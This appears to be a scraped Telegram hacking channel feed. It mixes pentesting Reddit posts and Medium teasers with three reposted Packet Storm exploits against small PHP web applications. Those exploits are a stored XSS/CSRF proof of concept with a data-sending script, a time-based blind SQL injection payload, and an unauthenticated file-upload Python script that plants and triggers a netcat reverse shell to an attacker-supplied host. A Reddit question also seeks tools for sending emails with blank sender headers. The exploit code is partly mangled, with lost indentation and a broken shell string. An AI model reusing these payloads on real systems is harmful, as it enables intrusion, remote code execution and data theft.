Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
vulnerable websites to self host
https://www.reddit.com/r/Pentesting/comments/m8zmb7/vulnerable_websites_to_self_host/

<!-- SC_OFF -->Hi people, I would like to host my own vulnerable website in a docker container, is there a site i can download bad websites for testing <!-- SC_ON --> submitted by /u/TechAus117 (https://www.reddit.com/user/TechAus117)
[link] (https://www.reddit.com/r/Pentesting/comments/m8zmb7/vulnerable_websites_to_self_host/) [comments] (https://www.reddit.com/r/Pentesting/comments/m8zmb7/vulnerable_websites_to_self_host/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Win32.Infostealer.Dexter Malware Analysis-WriteUp

https://cdn-images-1.medium.com/max/600/1*YqPQgDwOyp66i6qhb-EmgQ.jpeg
Win32.Infostealer.Dexter is part of a family of malware which are banking malware, stealing credentials such as passwords, credit card…

Continue reading on Medium »
Sending an Email with blank Header Address and SMTP Address
https://www.reddit.com/r/Pentesting/comments/m90r2d/sending_an_email_with_blank_header_address_and/

<!-- SC_OFF -->Anyone know any tools to send emails that can make either the header and/or the smtp address blank? <!-- SC_ON --> submitted by /u/Ok_Dragonfruit_3379 (https://www.reddit.com/user/Ok_Dragonfruit_3379)
[link] (https://www.reddit.com/r/Pentesting/comments/m90r2d/sending_an_email_with_blank_header_address_and/) [comments] (https://www.reddit.com/r/Pentesting/comments/m90r2d/sending_an_email_with_blank_header_address_and/)
hacking: security in practice
How do I become unhittable?

I’ve been having problems with hackers booting me offline, and grabbing my iP and personal information. Moving forward, what is the best possible software and/ or firewalls I can have in order to prevent being fucked with on the internet?

submitted by /u/jdankks
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Turbo Intruder : A Burp Suite Extension For Sending Large Numbers

Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It’s intended to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity. The following features set it apart: Fast – Turbo Intruder uses a HTTP stack hand-coded from scratch with speed in mind. […]

The post Turbo Intruder : A Burp Suite Extension For Sending Large Numbers appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
how to make an ultra-long-range wifi antenna

https://cdn-images-1.medium.com/max/1280/0*x9HzKuazM1a_TKgv.jpg
If you’re the red team pentester it's always useful to carry an ultra-long-range wifi antenna. which has high gain as well as high…

Continue reading on Medium »
Exploit Collector
Online News Portal 1.0 Cross Site Request Forgery / Cross Site Scripting

https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
Online News Portal version 1.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

MD5 | be06871e9ab8b5a97156d14ca9f143a3

Download
# Exploit Title: Online News Portal | Stored XSS + CSRF Example
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Steps.

1. Create a "evil.js" file with the below contents
----------------------------------------------------------------------------------------
var x = new XMLHttpRequest();
x.open("GET", "//127.0.0.1:8081/?c="+document.domain);
x.send();
----------------------------------------------------------------------------------------
2. Host the file locally. python3 -m http.server 8081
3. Goto http://127.0.0.1/pos_inv/index.php, login as a supplier (supplier/supplier)
4. Add product ..
----------------------------------------------------------------------------------------
Name:
Catagory: Laptops
Price: 1
Quantity: 1
Photo: None
----------------------------------------------------------------------------------------
POST /pos_inv/supplier/edit_product.php?id=28 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29152014675220535253532605082
Content-Length: 744
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/pos_inv/supplier/
Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
Upgrade-Insecure-Requests: 1

-----------------------------29152014675220535253532605082
Content-Disposition: form-data; name="name"
-----------------------------29152014675220535253532605082
Content-Disposition: form-data; name="category"

1
-----------------------------29152014675220535253532605082
Content-Disposition: form-data; name="price"

1
-----------------------------29152014675220535253532605082
Content-Disposition: form-data; name="qty"

1
-----------------------------29152014675220535253532605082
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------29152014675220535253532605082--

----------------------------------------------------------------------------------------
5. Click Update
6. Recieve CSRF

#Python server
127.0.0.1 - - [18/Mar/2021 13:59:46] "GET /evil.js HTTP/1.1" 304 -
127.0.0.1 - - [18/Mar/2021 13:59:46] "GET /?c=127.0.0.1 HTTP/1.1" 200 -

Source:packetstormsecurity.com
Exploit Collector
Online News Portal 1.0 SQL Injection

https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
Online News Portal version 1.0 suffers from a remote SQL injection vulnerability. This finding varies from the author's original finding earlier this month.

MD5 | 5e31b18a9802154a2959d3b354df250d

Download
# Exploit Title: Online News Portal | SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-18
# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Steps
# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
# Save request in BurpSuite
# Run saved request with sqlmap -r sql.txt
---
Parameter: MULTIPART name ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: -----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="name"

aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="category"

1
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="price"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="qty"

asd
-----------------------------15280280330873390203691218429
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream
-----------------------------15280280330873390203691218429--
---

Source:packetstormsecurity.com
Exploit Collector
Profiling System For Human Resource Management 1.0 Remote Code Execution

https://2.bp.blogspot.com/-DNFQNR6e8p4/WWlvIe_2SVI/AAAAAAAAILs/sd08rXaHefk0y1DdsYY6dPeiz0i718ntQCLcBGAs/s1600/h143.png
Profiling System for Human Resource Management version 1.0 suffers from a remote code execution vulnerability.

MD5 | ed72241bce9c3fd80331a96e1d6a858a

Download
# Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
# Date: 19-03-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html
# Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86

# --- Description --- #

# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.

# --- Proof of concept --- #

#!/usr/bin/python3
import random
import sys
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

def file_upload(target_ip, attacker_ip, attacker_port):
random_number = str(random.randint(100000000,999999999))
file_name = random_number + "shell.php"
revshell_string = '<?php&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')})
print("(+) Uploading php reverse shell file ..")
r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
if not "Sorry, there was an error uploading your file." in r1.text:
print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name))
return file_name
else:
print("(-) Oh noes, error occured while uploading the file.. quitting!")
exit()

def trigger_shell(target_ip, target_file_name):
url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name)
print("(+) Now trying to trigger our shell..")
r2 = requests.get(url)
if r2.status_code != 200:
print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!")
exit()
else:
return None

def main():
if len(sys.argv) != 4:
print('(+) usage: %s <target<attacker<attacker' % sys.argv[0])
print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
sys.exit(-1)

print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---")
print("----------------------------------------------------------------------------")
target_ip = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = sys.argv[3]

target_file_name = file_upload(target_ip, attacker_ip, attacker_port)
trigger_shell(target_ip, target_file_name)

print("(+) done!")

if __name__ == "__main__":
main()


Source:packetstormsecurity.com